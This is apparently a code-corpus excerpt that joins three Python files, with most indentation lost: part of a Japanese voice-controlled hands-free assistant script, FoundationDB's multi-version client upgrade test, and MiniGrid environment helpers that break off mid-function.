or english == 'end of the world':
play_cmd = '_handfree_playlist_06.bat'
elif english == 'end playlist' or english == 'end of bgm' \
or english == 'close playlist' or english == 'close bgm':
play_cmd = '_close_'
elif english == 'browser':
browser_cmd = '_open_'
elif english == 'end browser' or english == 'close browser' \
or english == 'browser exit':
browser_cmd = '_close_'
elif english == 'reset':
play_cmd = '_close_'
browser_cmd = '_close_'
if play_cmd == '_close_' or play_cmd != '':
playlist = subprocess.Popen(['_handfree_control_kill.bat'])
playlist.wait(2000)
playlist.terminate()
playlist = None
time.sleep(1)
if play_cmd != '':
if os.path.exists(play_cmd):
playlist = subprocess.Popen([play_cmd])
if browser_cmd == '_open_':
if browser is None:
urlx = 'https://www.google.co.jp/'
browser = subprocess.Popen(['_handfree_web_open.bat', urlx])
if browser_cmd == '_close_':
browser = subprocess.Popen(['_handfree_web_kill.bat'])
browser.wait(2000)
browser.terminate()
browser = None
if not browser is None:
if browser_cmd == '' and play_cmd == '' and japanese != '':
url = ''
title = ''
text = ''
if url == '':
if english[:9] == 'periscope':
url = 'https://www.pscp.tv/'
if url == '':
try:
                                # run a Google search with the recognized keyword(s)
list_keywd = [japanese]
resp = web.get('https://www.google.co.jp/search?num=10&q=' + ' '.join(list_keywd))
resp.raise_for_status()
                                # parse the retrieved HTML
soup = bs4.BeautifulSoup(resp.text, "html.parser")
link_elem01 = soup.select('.r > a')
link_elem02 = soup.select('.s > .st')
title = link_elem01[0].get_text()
title = urllib.parse.unquote(title)
text = link_elem01[0].get_text()
text = urllib.parse.unquote(text)
text = text.replace('\n', '')
url = link_elem01[0].get('href')
url = url.replace('/url?q=', '')
if url.find('&sa=') >= 0:
url = url[:url.find('&sa=')]
url = urllib.parse.unquote(url)
url = urllib.parse.unquote(url)
#print(title)
#print(text)
#print(url)
except:
pass
#browser = subprocess.Popen(['_handfree_web_kill.bat'])
#browser.wait(2000)
#browser.terminate()
#browser = None
if url != '':
print(url)
browser = subprocess.Popen(['_handfree_web_open.bat', url])
else:
browser = subprocess.Popen(['_handfree_web_open.bat', japanese])
if not playlist is None:
try:
playlist.wait(0.1)
playlist = None
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('extpgm__:terminate')
playlist = subprocess.Popen(['_handfree_control_kill.bat'])
playlist.wait(2000)
if not playlist is None:
playlist.terminate()
playlist = None
browser = subprocess.Popen(['_handfree_web_kill.bat'])
browser.wait(2000)
if not browser is None:
browser.terminate()
browser = None
print('extpgm__:end')
def sub_vision(cn_r,cn_s):
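    """Worker thread: keep a _vision_capture.py subprocess running with
    parameters chosen by runmode, and signal END once it reports a result."""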
print('vision__:init')
runmode = cn_r.get()
camdev = cn_r.get()
camrote = cn_r.get()
cn_r.task_done()
print('vision__:runmode=' + str(runmode))
print('vision__:camdev =' + str(camdev ))
print('vision__:camrote=' + str(camrote))
print('vision__:start')
vision = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('vision__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
print('vision__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if vision is None:
if camdev != 'None':
if runmode == 'translator':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'cars.xml', 'fullbody.xml', 'None', '3600'])
elif runmode == 'learning':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'cars.xml', 'fullbody.xml', 'None', '3600'])
elif runmode == 'reception':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'640', 'face.xml', 'fullbody.xml', 'azure_capture_face.bat', '120'])
elif runmode == 'camera':
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'1920', 'None', 'None', 'None', '120'])
else:
vision = subprocess.Popen(['python', '_vision_capture.py', camdev, camrote, \
'640', 'None', 'None', 'None', '0'])
if not vision is None:
try:
vision.wait(0.1)
vision = None
try:
camResult = 'temp/temp_camResult.txt'
if os.path.exists(camResult):
rt = codecs.open(camResult, 'r', 'utf-8')
txt = ''
for t in rt:
txt = (txt + ' ' + str(t)).strip()
                            rt.close()
rt = None
cn_s.put(['END', ''])
break
except:
pass
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('vision__:terminate')
if not vision is None:
vision.terminate()
vision = None
print('vision__:end')
def sub_speech(cn_r,cn_s):
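    """Worker thread: keep a _speech_allinone.py subprocess running with the
    language and microphone settings chosen by runmode, restarting it when it exits."""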
print('speech__:init')
runmode = cn_r.get()
micdev = cn_r.get()
mictype = cn_r.get()
miclevel= cn_r.get()
micguide= cn_r.get()
api = cn_r.get()
cn_r.task_done()
print('speech__:runmode =' + str(runmode ))
print('speech__:micdev =' + str(micdev ))
print('speech__:mictype =' + str(mictype ))
print('speech__:miclevel=' + str(miclevel))
print('speech__:micguide=' + str(micguide))
print('speech__:api =' + str(api ))
print('speech__:start')
speech = None
while True:
if cn_r.qsize() > 0:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if mode_get is None:
print('speech__:None=break')
break
if cn_r.qsize() != 0 or cn_s.qsize() > 2:
print('speech__: queue overflow warning!',cn_r.qsize(),cn_s.qsize())
if speech is None:
if micdev != 'None':
if runmode == 'translator':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', runmode, \
'temp/temp_micON.txt', 'Default', 'None'])
elif runmode == 'learning':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', runmode, \
'temp/temp_micON.txt', 'Default', 'None'])
elif runmode == 'reception':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'ja', 'ja', 'speech', \
'temp/temp_micON.txt', 'Default', 'azure_speech_id.bat'])
elif runmode == 'camera':
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'ja', 'ja', 'speech', \
'None', 'Default', 'None'])
else:
speech = subprocess.Popen(['python', '_speech_allinone.py', micdev, mictype, miclevel, micguide, \
api, 'ja', 'en', 'ja', 'translator', \
'None', 'Default', 'None'])
if not speech is None:
try:
speech.wait(0.1)
speech = None
except:
pass
cn_s.put(['OK', ''])
if cn_r.qsize() == 0:
time.sleep(0.03)
print('speech__:terminate')
if not speech is None:
speech.terminate()
speech = None
print('speech__:end')
if __name__ == '__main__':
print('handfree:init')
    print('handfree:usage: _handfree_control.py runmode camdev camrote micdev mictype miclevel micguide api')
runmode = 'translator'
camdev = '0'
camrote = '0'
micdev = '0'
mictype = 'bluetooth'
miclevel= '1555'
micguide= 'on'
api = 'free'
if len(sys.argv)>=2:
runmode = sys.argv[1]
if len(sys.argv)>=3:
camdev = sys.argv[2]
if len(sys.argv)>=4:
camrote = sys.argv[3]
if len(sys.argv)>=5:
micdev = sys.argv[4]
if len(sys.argv)>=6:
mictype = sys.argv[5]
if len(sys.argv)>=7:
miclevel= sys.argv[6]
if len(sys.argv)>=8:
micguide= sys.argv[7]
if len(sys.argv)>=9:
api = sys.argv[8]
print('')
print('handfree:runmode =' + str(runmode ))
print('handfree:camdev =' + str(camdev ))
print('handfree:camrote =' + str(camrote ))
print('handfree:micdev =' + str(micdev ))
print('handfree:mictype =' + str(mictype ))
print('handfree:miclevel=' + str(miclevel))
print('handfree:micguide=' + str(micguide))
print('handfree:api =' + str(api ))
v_micoff()
print('')
print('handfree:start')
main_start = time.time()
vision_s = queue.Queue()
vision_r = queue.Queue()
vision_proc = None
vision_beat = 0
vision_skip = 0
speech_s = queue.Queue()
speech_r = queue.Queue()
speech_proc = None
speech_beat = 0
speech_skip = 0
extpgm_s = queue.Queue()
extpgm_r = queue.Queue()
extpgm_proc = None
extpgm_beat = 0
extpgm_skip = 0
    once = True
while True:
# Thread timeout check
if (vision_r.qsize() == 0) and (vision_beat != 0):
sec = int(time.time() - vision_beat)
if sec > 60:
                print('handfree:vision_proc 60s')
#vision_beat = time.time()
print('handfree:vision_proc break')
vision_s.put([None, None])
time.sleep(3.0)
vision_proc = None
vision_beat = 0
vision_skip = 0
if (speech_r.qsize() == 0) and (speech_beat != 0):
sec = int(time.time() - speech_beat)
if sec > 60:
print('handfree:speech_proc 60s')
#speech_beat = time.time()
print('handfree:speech_proc break')
speech_s.put([None, None])
time.sleep(3.0)
speech_proc = None
speech_beat = 0
speech_skip = 0
if (extpgm_r.qsize() == 0) and (extpgm_beat != 0):
sec = int(time.time() - extpgm_beat)
if sec > 60:
print('handfree:extpgm_proc 60s')
#extpgm_beat = time.time()
print('handfree:extpgm_proc break')
extpgm_s.put([None, None])
time.sleep(3.0)
extpgm_proc = None
extpgm_beat = 0
extpgm_skip = 0
# Thread start
if vision_proc is None:
while vision_s.qsize() > 0:
dummy = vision_s.get()
while vision_r.qsize() > 0:
dummy = vision_r.get()
vision_proc = threading.Thread(target=sub_vision, args=(vision_s,vision_r,))
vision_proc.daemon = True
vision_s.put(runmode)
vision_s.put(camdev )
vision_s.put(camrote)
vision_proc.start()
time.sleep(5.0)
vision_s.put(['START', ''])
vision_beat = time.time()
vision_skip = 0
if speech_proc is None:
while speech_s.qsize() > 0:
dummy = speech_s.get()
while speech_r.qsize() > 0:
dummy = speech_r.get()
speech_proc = threading.Thread(target=sub_speech, args=(speech_s,speech_r,))
speech_proc.daemon = True
speech_s.put(runmode )
speech_s.put(micdev )
speech_s.put(mictype )
speech_s.put(miclevel)
speech_s.put(micguide)
speech_s.put(api )
speech_proc.start()
time.sleep(5.0)
speech_s.put(['START', ''])
speech_beat = time.time()
speech_skip = 0
if extpgm_proc is None:
while extpgm_s.qsize() > 0:
dummy = extpgm_s.get()
while extpgm_r.qsize() > 0:
dummy = extpgm_r.get()
extpgm_proc = threading.Thread(target=sub_extpgm, args=(extpgm_s,extpgm_r,))
extpgm_proc.daemon = True
extpgm_s.put(runmode )
extpgm_s.put(camdev )
extpgm_proc.start()
time.sleep(5.0)
extpgm_s.put(['START', ''])
extpgm_beat = time.time()
extpgm_skip = 0
# processing
if vision_r.qsize() > 0:
vision_get = vision_r.get()
vision_res = vision_get[0]
vision_dat = vision_get[1]
vision_r.task_done()
if vision_res == 'END':
break
if vision_r.qsize() == 0 and vision_s.qsize() == 0:
vision_skip += 1
else:
vision_skip = 0
if vision_skip > 50:
vision_s.put(['RUN', ''])
vision_beat = time.time()
vision_skip = 0
if speech_r.qsize() > 0:
speech_get = speech_r.get()
speech_res = speech_get[0]
speech_dat = speech_get[1]
speech_r.task_done()
if speech_res == 'END':
break
if speech_r.qsize() == 0 and speech_s.qsize() == 0:
speech_skip += 1
else:
speech_skip = 0
if speech_skip > 50:
speech_s.put(['RUN', ''])
speech_beat = time.time()
speech_skip = 0
if extpgm_r.qsize() > 0:
extpgm_get = extpgm_r.get()
extpgm_res = extpgm_get[0]
extpgm_dat = extpgm_get[1]
extpgm_r.task_done()
if extpgm_res == 'END':
break
if extpgm_r.qsize() == 0 and extpgm_s.qsize() == 0:
extpgm_skip += 1
else:
extpgm_skip = 0
if extpgm_skip > 50:
extpgm_s.put(['RUN', ''])
extpgm_beat = time.time()
extpgm_skip = 0
        if once:
            once = False
if micdev != 'None':
if runmode == 'translator' or runmode == 'learning':
#v_output('This is a hands-free control systems,')
#v_output('First function is translation of multiple languages,')
#if runmode == 'learning':
# v_output('with speech feedback for studying japanese,')
#v_output('Second function is select music playlist 0 to 6,')
#v_output('Third function is voice control web browser,')
v_output('ハンズフリー音声制御システムが開始されました。')
v_output('第1機能として、複数言語に対応した音声翻訳ができます。')
if runmode == 'learning':
v_output('日本語学習できるように音声フィードバックも行います。')
v_output('第2機能として、音楽プレイリストのゼロから6を、再生できます。')
v_output('第3機能として、ウェブブラウザーを、音声制御できます。')
time.sleep(3.0)
v_micon()
time.sleep(0.01)
print('')
print('handfree:terminate')
vision_s.put([None, None])
speech_s.put([None, None])
extpgm_s.put([None, None])
vision_proc.join()
speech_proc.join()
extpgm_proc.join()
print('')
print('handfree:bye!')
|
upgrade_test.py
|
#!/usr/bin/env python3
from argparse import ArgumentParser, RawDescriptionHelpFormatter
import glob
import os
from pathlib import Path
import platform
import random
import shutil
import stat
import subprocess
import sys
from threading import Thread, Event
import traceback
import time
from urllib import request
import hashlib
from local_cluster import LocalCluster, random_secret_string
SUPPORTED_PLATFORMS = ["x86_64"]
SUPPORTED_VERSIONS = ["7.2.0", "7.1.1", "7.1.0", "7.0.0", "6.3.24", "6.3.23",
"6.3.22", "6.3.18", "6.3.17", "6.3.16", "6.3.15", "6.3.13", "6.3.12", "6.3.9", "6.2.30",
"6.2.29", "6.2.28", "6.2.27", "6.2.26", "6.2.25", "6.2.24", "6.2.23", "6.2.22", "6.2.21",
"6.2.20", "6.2.19", "6.2.18", "6.2.17", "6.2.16", "6.2.15", "6.2.10", "6.1.13", "6.1.12",
"6.1.11", "6.1.10", "6.0.18", "6.0.17", "6.0.16", "6.0.15", "6.0.14", "5.2.8", "5.2.7",
"5.1.7", "5.1.6"]
FDB_DOWNLOAD_ROOT = "https://github.com/apple/foundationdb/releases/download/"
CURRENT_VERSION = "7.2.0"
HEALTH_CHECK_TIMEOUT_SEC = 5
PROGRESS_CHECK_TIMEOUT_SEC = 30
TRANSACTION_RETRY_LIMIT = 100
MAX_DOWNLOAD_ATTEMPTS = 5
RUN_WITH_GDB = False
def make_executable(path):
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IEXEC)
def remove_file_no_fail(filename):
try:
os.remove(filename)
except OSError:
pass
def version_from_str(ver_str):
ver = [int(s) for s in ver_str.split(".")]
assert len(ver) == 3, "Invalid version string {}".format(ver_str)
return ver
def api_version_from_str(ver_str):
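    """Map a version string to its FDB API version, e.g. "7.1.0" -> 710."""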
ver_tuple = version_from_str(ver_str)
return ver_tuple[0]*100+ver_tuple[1]*10
def version_before(ver_str1, ver_str2):
return version_from_str(ver_str1) < version_from_str(ver_str2)
def random_sleep(minSec, maxSec):
timeSec = random.uniform(minSec, maxSec)
print("Sleeping for {0:.3f}s".format(timeSec))
time.sleep(timeSec)
def compute_sha256(filename):
hash = hashlib.sha256()
with open(filename, 'rb') as f:
while True:
data = f.read(128*1024)
if not data:
break
hash.update(data)
return hash.hexdigest()
def read_to_str(filename):
with open(filename, 'r') as f:
return f.read()
class UpgradeTest:
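    """Set up a local FDB cluster with old binaries, run a tester workload against
    it, and upgrade the cluster along `upgrade_path`, checking cluster health and
    workload progress after each step."""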
def __init__(self, build_dir: str, upgrade_path: list, process_number: int = 1, port: str = None):
self.build_dir = Path(build_dir).resolve()
assert self.build_dir.exists(), "{} does not exist".format(build_dir)
assert self.build_dir.is_dir(), "{} is not a directory".format(build_dir)
self.upgrade_path = upgrade_path
for version in upgrade_path:
assert version in SUPPORTED_VERSIONS, "Unsupported version {}".format(
version)
self.platform = platform.machine()
assert self.platform in SUPPORTED_PLATFORMS, "Unsupported platform {}".format(
self.platform)
self.tmp_dir = self.build_dir.joinpath(
"tmp",
random_secret_string(16)
)
self.tmp_dir.mkdir(parents=True)
self.download_dir = self.build_dir.joinpath(
"tmp",
"old_binaries"
)
self.download_old_binaries()
self.create_external_lib_dir()
init_version = upgrade_path[0]
self.cluster = LocalCluster(
self.tmp_dir,
self.binary_path(init_version, "fdbserver"),
self.binary_path(init_version, "fdbmonitor"),
self.binary_path(init_version, "fdbcli"),
process_number,
port=port,
create_config=False
)
self.cluster.create_cluster_file()
self.configure_version(init_version)
self.log = self.cluster.log
self.etc = self.cluster.etc
self.data = self.cluster.data
self.input_pipe_path = self.tmp_dir.joinpath(
"input.{}".format(random_secret_string(8)))
self.output_pipe_path = self.tmp_dir.joinpath(
"output.{}".format(random_secret_string(8)))
os.mkfifo(self.input_pipe_path)
os.mkfifo(self.output_pipe_path)
self.progress_event = Event()
def binary_path(self, version, bin_name):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("bin", bin_name)
else:
return self.download_dir.joinpath(version, bin_name)
def lib_dir(self, version):
if version == CURRENT_VERSION:
return self.build_dir.joinpath("lib")
else:
return self.download_dir.joinpath(version)
# Download an old binary of a given version from a remote repository
def download_old_binary(self, version, target_bin_name, remote_bin_name, makeExecutable):
local_file = self.binary_path(version, target_bin_name)
if (local_file.exists()):
return
self.download_dir.joinpath(version).mkdir(
parents=True, exist_ok=True)
remote_file = "{}{}/{}".format(FDB_DOWNLOAD_ROOT,
version, remote_bin_name)
remote_sha256 = "{}.sha256".format(remote_file)
local_sha256 = Path("{}.sha256".format(local_file))
for attempt_cnt in range(MAX_DOWNLOAD_ATTEMPTS):
print("Downloading '{}' to '{}'...".format(remote_file, local_file))
request.urlretrieve(remote_file, local_file)
print("Downloading '{}' to '{}'...".format(
remote_sha256, local_sha256))
request.urlretrieve(remote_sha256, local_sha256)
print("Download complete")
assert local_file.exists(), "{} does not exist".format(local_file)
assert local_sha256.exists(), "{} does not exist".format(local_sha256)
expected_checksum = read_to_str(local_sha256)
            actual_checksum = compute_sha256(local_file)
            if expected_checksum == actual_checksum:
print("Checksum OK")
break
print("Checksum mismatch. Expected: {} Actual: {}".format(
                expected_checksum, actual_checksum))
if attempt_cnt == MAX_DOWNLOAD_ATTEMPTS-1:
assert False, "Failed to download {} after {} attempts".format(
local_file, MAX_DOWNLOAD_ATTEMPTS)
if makeExecutable:
make_executable(local_file)
# Download all old binaries required for testing the specified upgrade path
def download_old_binaries(self):
for version in self.upgrade_path:
if version == CURRENT_VERSION:
continue
self.download_old_binary(version,
"fdbserver", "fdbserver.{}".format(self.platform), True)
self.download_old_binary(version,
"fdbmonitor", "fdbmonitor.{}".format(self.platform), True)
self.download_old_binary(version,
"fdbcli", "fdbcli.{}".format(self.platform), True)
self.download_old_binary(version,
"libfdb_c.so", "libfdb_c.{}.so".format(self.platform), False)
# Create a directory for external client libraries for MVC and fill it
# with the libraries necessary for the specified upgrade path
def create_external_lib_dir(self):
self.external_lib_dir = self.tmp_dir.joinpath("client_libs")
self.external_lib_dir.mkdir(parents=True)
for version in self.upgrade_path:
src_file_path = self.lib_dir(version).joinpath("libfdb_c.so")
assert src_file_path.exists(), "{} does not exist".format(src_file_path)
target_file_path = self.external_lib_dir.joinpath(
"libfdb_c.{}.so".format(version))
shutil.copyfile(src_file_path, target_file_path)
# Perform a health check of the cluster: Use fdbcli status command to check if the number of
# server processes and their versions are as expected
def health_check(self, timeout_sec=HEALTH_CHECK_TIMEOUT_SEC):
retries = 0
while retries < timeout_sec:
retries += 1
status = self.cluster.get_status()
if not "processes" in status["cluster"]:
print("Health check: no processes found. Retrying")
time.sleep(1)
continue
num_proc = len(status["cluster"]["processes"])
if (num_proc < self.cluster.process_number):
print("Health check: {} of {} processes found. Retrying".format(
num_proc, self.cluster.process_number))
time.sleep(1)
continue
assert num_proc == self.cluster.process_number, "Number of processes: expected: {}, actual: {}".format(
self.cluster.process_number, num_proc)
for (_, proc_stat) in status["cluster"]["processes"].items():
proc_ver = proc_stat["version"]
assert proc_ver == self.cluster_version, "Process version: expected: {}, actual: {}".format(
self.cluster_version, proc_ver)
print("Health check: OK")
return
assert False, "Health check: Failed"
# Create and save a cluster configuration for the given version
def configure_version(self, version):
self.cluster.fdbmonitor_binary = self.binary_path(
version, "fdbmonitor")
self.cluster.fdbserver_binary = self.binary_path(version, "fdbserver")
self.cluster.fdbcli_binary = self.binary_path(version, "fdbcli")
self.cluster.set_env_var = "LD_LIBRARY_PATH", self.lib_dir(version)
if (version_before(version, "7.1.0")):
self.cluster.use_legacy_conf_syntax = True
self.cluster.save_config()
self.cluster_version = version
# Upgrade the cluster to the given version
def upgrade_to(self, version):
print("Upgrading to version {}".format(version))
self.cluster.stop_cluster()
self.configure_version(version)
self.cluster.ensure_ports_released()
self.cluster.start_cluster()
print("Upgraded to {}".format(version))
def __enter__(self):
print("Starting cluster version {}".format(self.cluster_version))
self.cluster.start_cluster()
self.cluster.create_database(enable_tenants=False)
return self
    def __exit__(self, exc_type, exc_value, traceback):
self.cluster.stop_cluster()
shutil.rmtree(self.tmp_dir)
# Determine FDB API version matching the upgrade path
def determine_api_version(self):
self.api_version = api_version_from_str(CURRENT_VERSION)
for version in self.upgrade_path:
self.api_version = min(
api_version_from_str(version), self.api_version)
# Start the tester to generate the workload specified by the test file
def exec_workload(self, test_file):
self.tester_retcode = 1
try:
self.determine_api_version()
cmd_args = [self.tester_bin,
'--cluster-file', self.cluster.cluster_file,
'--test-file', test_file,
'--external-client-dir', self.external_lib_dir,
'--disable-local-client',
'--input-pipe', self.input_pipe_path,
'--output-pipe', self.output_pipe_path,
'--api-version', str(self.api_version),
'--log',
'--log-dir', self.log,
'--tmp-dir', self.tmp_dir,
'--transaction-retry-limit', str(TRANSACTION_RETRY_LIMIT)]
if (RUN_WITH_GDB):
cmd_args = ['gdb', '-ex', 'run', '--args'] + cmd_args
print("Executing test command: {}".format(
" ".join([str(c) for c in cmd_args])))
self.tester_proc = subprocess.Popen(
cmd_args, stdout=sys.stdout, stderr=sys.stderr)
self.tester_retcode = self.tester_proc.wait()
self.tester_proc = None
if (self.tester_retcode != 0):
print("Tester failed with return code {}".format(
self.tester_retcode))
except Exception:
print("Execution of test workload failed")
print(traceback.format_exc())
# Perform a progress check: Trigger it and wait until it is completed
def progress_check(self, ctrl_pipe):
self.progress_event.clear()
os.write(ctrl_pipe, b"CHECK\n")
self.progress_event.wait(
None if RUN_WITH_GDB else PROGRESS_CHECK_TIMEOUT_SEC)
if (self.progress_event.is_set()):
print("Progress check: OK")
else:
assert False, "Progress check failed after upgrade to version {}".format(
self.cluster_version)
# The main function of a thread for reading and processing
# the notifications received from the tester
def output_pipe_reader(self):
try:
print("Opening pipe {} for reading".format(self.output_pipe_path))
self.output_pipe = open(self.output_pipe_path, 'r')
for line in self.output_pipe:
msg = line.strip()
print("Received {}".format(msg))
if (msg == "CHECK_OK"):
self.progress_event.set()
self.output_pipe.close()
except Exception as e:
print("Error while reading output pipe", e)
print(traceback.format_exc())
# Execute the upgrade test workflow according to the specified
# upgrade path: perform the upgrade steps and check success after each step
def exec_upgrade_test(self):
print("Opening pipe {} for writing".format(self.input_pipe_path))
ctrl_pipe = os.open(self.input_pipe_path, os.O_WRONLY)
try:
self.health_check()
self.progress_check(ctrl_pipe)
for version in self.upgrade_path[1:]:
random_sleep(0.0, 2.0)
self.upgrade_to(version)
self.health_check()
self.progress_check(ctrl_pipe)
os.write(ctrl_pipe, b"STOP\n")
finally:
os.close(ctrl_pipe)
# Kill the tester process if it is still alive
def kill_tester_if_alive(self, workload_thread):
if not workload_thread.is_alive():
return
if self.tester_proc is not None:
try:
print("Killing the tester process")
self.tester_proc.kill()
workload_thread.join(5)
            except Exception:
print("Failed to kill the tester process")
# The main method implementing the test:
# - Start a thread for generating the workload using a tester binary
# - Start a thread for reading notifications from the tester
# - Trigger the upgrade steps and checks in the main thread
def exec_test(self, args):
self.tester_bin = self.build_dir.joinpath("bin", "fdb_c_api_tester")
assert self.tester_bin.exists(), "{} does not exist".format(self.tester_bin)
self.tester_proc = None
test_retcode = 1
try:
workload_thread = Thread(
target=self.exec_workload, args=(args.test_file,))
workload_thread.start()
reader_thread = Thread(target=self.output_pipe_reader)
reader_thread.start()
self.exec_upgrade_test()
test_retcode = 0
except Exception:
print("Upgrade test failed")
print(traceback.format_exc())
self.kill_tester_if_alive(workload_thread)
finally:
workload_thread.join(5)
reader_thread.join(5)
self.kill_tester_if_alive(workload_thread)
if test_retcode == 0:
test_retcode = self.tester_retcode
return test_retcode
def grep_logs_for_events(self, severity):
return (
subprocess.getoutput(
"grep -r 'Severity=\"{}\"' {}".format(
severity,
self.cluster.log.as_posix())
)
.rstrip()
.splitlines()
)
# Check the cluster log for errors
def check_cluster_logs(self, error_limit=100):
        sev40s = self.grep_logs_for_events("40")
err_cnt = 0
for line in sev40s:
# When running ASAN we expect to see this message. Boost coroutine should be using the
# correct asan annotations so that it shouldn't produce any false positives.
if line.endswith(
"WARNING: ASan doesn't fully support makecontext/swapcontext functions and may produce false positives in some cases!"
):
continue
if (err_cnt < error_limit):
print(line)
err_cnt += 1
if err_cnt > 0:
            print(
                ">>>>>>>>>>>>>>>>>>>> Found {} severity 40 events - the test fails".format(err_cnt))
else:
print("No errors found in logs")
return err_cnt == 0
# Check the server and client logs for warnings and dump them
def dump_warnings_in_logs(self, limit=100):
        sev30s = self.grep_logs_for_events("30")
        if len(sev30s) == 0:
print("No warnings found in logs")
else:
print(">>>>>>>>>>>>>>>>>>>> Found {} severity 30 events (warnings):".format(
len(sev30s)))
for line in sev30s[:limit]:
print(line)
# Dump the last cluster configuration and cluster logs
def dump_cluster_logs(self):
for etc_file in glob.glob(os.path.join(self.cluster.etc, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(etc_file))
with open(etc_file, "r") as f:
print(f.read())
for log_file in glob.glob(os.path.join(self.cluster.log, "*")):
print(">>>>>>>>>>>>>>>>>>>> Contents of {}:".format(log_file))
with open(log_file, "r") as f:
print(f.read())
if __name__ == "__main__":
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description="""
A script for testing FDB multi-version client in upgrade scenarios. Creates a local cluster,
generates a workload using fdb_c_api_tester with a specified test file, and performs
cluster upgrade according to the specified upgrade path. Checks if the workload successfully
progresses after each upgrade step.
""",
)
parser.add_argument(
"--build-dir",
"-b",
metavar="BUILD_DIRECTORY",
help="FDB build directory",
required=True,
)
parser.add_argument(
'--upgrade-path',
nargs='+',
help='Cluster upgrade path: a space separated list of versions',
default=[CURRENT_VERSION]
)
parser.add_argument(
'--test-file',
help='A .toml file describing a test workload to be generated with fdb_c_api_tester',
required=True,
)
parser.add_argument(
"--process-number",
"-p",
help="Number of fdb processes running (default: 0 - random)",
type=int,
default=0,
)
parser.add_argument(
'--disable-log-dump',
help='Do not dump cluster log on error',
action="store_true"
)
parser.add_argument(
'--run-with-gdb',
help='Execute the tester binary from gdb',
action="store_true"
)
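    # Example invocation (paths and versions are illustrative):
    #   ./upgrade_test.py -b <FDB_BUILD_DIR> --upgrade-path 6.3.24 7.0.0 7.2.0 \
    #       --test-file <WORKLOAD>.toml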
args = parser.parse_args()
if (args.process_number == 0):
args.process_number = random.randint(1, 5)
print("Testing with {} processes".format(args.process_number))
if (args.run_with_gdb):
RUN_WITH_GDB = True
errcode = 1
with UpgradeTest(args.build_dir, args.upgrade_path, args.process_number) as test:
print("log-dir: {}".format(test.log))
print("etc-dir: {}".format(test.etc))
print("data-dir: {}".format(test.data))
print("cluster-file: {}".format(test.etc.joinpath("fdb.cluster")))
errcode = test.exec_test(args)
if not test.check_cluster_logs():
errcode = 1 if errcode == 0 else errcode
test.dump_warnings_in_logs()
if errcode != 0 and not args.disable_log_dump:
test.dump_cluster_logs()
sys.exit(errcode)
|
penv.py
|
import gym
from gym_minigrid.minigrid import OBJECT_TO_IDX, COLOR_TO_IDX
from multiprocessing import Process, Pipe
def get_global(env, obs):
# get global view
grid = env.grid
# position agent
x, y = env.agent_pos
# rotate to match agent's orientation
for i in range(env.agent_dir + 1):
# rotate grid
grid = grid.rotate_left()
# rotate position of agent
x_new = y
y_new = grid.height - 1 - x
x = x_new
y = y_new
# encode image for model
image = grid.encode()
# overlap global with receiver observation, i.e., include carried objects
image[x, y, :] = obs["image"][3, 6, :]
# indicate position of agent
image[x, y, 0] += 10
return image
def get_local(obs):
# get local view
return obs["image"][3:4, 5:7, :]
def get_agent_loc(env):
# get global view
grid = env.grid
# position agent
x, y = env.agent_pos
# rotate to match agent's orientation
for i in range(env.agent_dir + 1):
# rotate position of agent
x_new = y
y_new = grid.height - 1 - x
x = x_new
y = y_new
agent_x = x
agent_y = y
return agent_x, agent_y
def get_goal(env):
goal_type = OBJECT_TO_IDX[env.instrs.desc.type]
goal_color = COLOR_TO_IDX[env.instrs.desc.color]
return goal_type, goal_color
def get_goal_loc(globs):
x, y = (( 3 < globs["image"][:, :, 0]) * (globs["image"][:, :, 0] < 8) +
(13 < globs["image"][:, :, 0]) * (globs["image"][:, :, 0] < 18)).nonzero()
goal_x = x[0]
goal_y = y[0]
return goal_x, goal_y
def reset(env, n, conventional, archimedean, informed_sender):
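    # reset the env and build the initial (sender, receiver) observation pair;
    # the sender gets the global view unless `archimedean` swaps the two views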
obs = env.reset()
active_sender = env.step_count % n == 0
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (active_sender, False)
globs = obs.copy()
globs["image"] = get_global(env, obs)
obs["image"] = get_local(obs)
obss = (globs, obs) if not archimedean else (obs, globs)
if not informed_sender:
obss[0]["mission"] = "unknown"
agent_x, agent_y = get_agent_loc(env)
goal_type, goal_color = get_goal(env)
goal_x, goal_y = get_goal_loc(globs)
extra = (agent_x, agent_y, goal_type, goal_color, goal_x, goal_y)
return active, acting, sending, obss, extra
def step(env, n, conventional, archimedean, informed_sender, action, prev_result):
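    # advance the underlying env only on the receiver's frame; on the sender's
    # frame just recompute the role flags and reuse the previous observations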
if prev_result[0][1]:
# receiver's frame
obs, reward, done, info = env.step(action)
done = done or 64 <= env.step_count
if done:
obs = env.reset()
active_sender = True if conventional else env.step_count % n == 0
active_receiver = not active_sender
active = (active_sender, active_receiver)
acting = (False, active_receiver)
sending = (env.step_count % n == 0, False) if conventional else (active_sender, False)
globs = obs.copy()
globs["image"] = get_global(env, obs)
obs["image"] = get_local(obs)
obss = (globs, obs) if not archimedean else (obs, globs)
if not informed_sender:
obss[0]["mission"] = "unknown"
agent_x, agent_y = get_agent_loc(env)
goal_type, goal_color = get_goal(env)
